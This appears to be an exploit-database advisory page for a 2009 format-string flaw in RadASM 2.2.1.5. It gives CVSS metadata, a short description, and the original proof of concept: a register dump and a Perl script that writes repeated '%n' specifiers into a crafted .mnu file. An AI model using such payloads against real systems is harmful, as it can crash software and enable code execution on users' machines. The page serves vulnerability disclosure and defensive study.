RadASM 2.2.1.5 (.mnu File) Format string Poc

vendor:

RadASM

by:

SkuLL-HacKeR

7,5

CVSS

HIGH

Format String

134

CWE

Product Name: RadASM

Affected Version From: 2.2.1.5

Affected Version To: 2.2.1.5

Patch Exists: NO

Related CWE: N/A

CPE: a:radasm:radasm:2.2.1.5

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

RadASM 2.2.1.5 (.mnu File) Format string Poc

RadASM 2.2.1.5 is vulnerable to a format string vulnerability. By creating a specially crafted .mnu file, an attacker can overwrite the ECX register and execute arbitrary code. The vulnerability is triggered when the application attempts to open the malicious .mnu file.

Mitigation:

No known mitigation or remediation is available for this vulnerability.

Source

Exploit-DB raw data:

# RadASM 2.2.1.5 (.mnu File) Format string Poc
# By SkuLL-HacKeR
# GreetZ : hack4love - Aser ro7 - ThE g0bL!N - Qabandi
# EAX 00002E2E
# ECX 41413D92 ECX overwrited
# EDX 00000002
# EBX 00000000
# ESP 0013F894
# EBP 0013F9AC ASCII "..................................................................."
# ESI 00187658 ASCII "%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n"
# EDI 0013FFFE
# EIP 0040171A TbrCreat.0040171A
# directory app
# C:\Documents and Settings\Administrateur\Bureau\aRadASM\AddIns\TbrCreate.exe
# i think is hard to exploit maybe anyone can exploit it :d
my $unicode="%n" x 161;
my $file="xpl.mnu";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $unicode ;
close($FILE);
print "$file has been created \n";

# milw0rm.com [2009-08-03]